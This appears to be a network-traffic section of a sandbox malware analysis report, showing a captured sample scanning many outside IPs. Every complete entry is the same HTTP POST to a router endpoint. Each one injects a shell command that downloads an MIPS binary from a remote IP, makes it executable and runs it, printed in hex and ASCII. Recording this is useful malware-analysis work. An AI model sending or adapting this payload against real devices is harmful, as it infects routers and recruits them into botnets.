                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1357192.168.2.235167037.120.38.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371862888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1358192.168.2.235800488.214.247.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371862888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1359192.168.2.2347732167.40.150.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371871948 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1360192.168.2.2350222194.246.120.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371880054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1361192.168.2.234023453.139.212.1778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371903896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1362192.168.2.2354004151.19.103.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371921062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1363192.168.2.2343282110.72.134.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371932983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1364192.168.2.235186691.10.156.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371962070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1365192.168.2.2346150151.202.31.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371994019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1366192.168.2.2357664153.127.96.748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372014999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1367192.168.2.2350820152.243.64.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372082949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1368192.168.2.235591612.166.5.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372128963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1369192.168.2.2347214147.177.8.2488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372167110 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1370192.168.2.235282882.134.17.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372281075 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1371192.168.2.2336262138.188.241.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372297049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1372192.168.2.235952618.42.91.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372308969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1373192.168.2.234659640.109.248.2188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372334957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1374192.168.2.235516853.15.21.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372368097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1375192.168.2.2348028157.25.27.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372385979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1376192.168.2.2333048107.35.34.328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372401953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1377192.168.2.234635262.56.249.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372417927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1378192.168.2.234643843.90.231.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372438908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1379192.168.2.2344154129.92.145.388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372442961 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
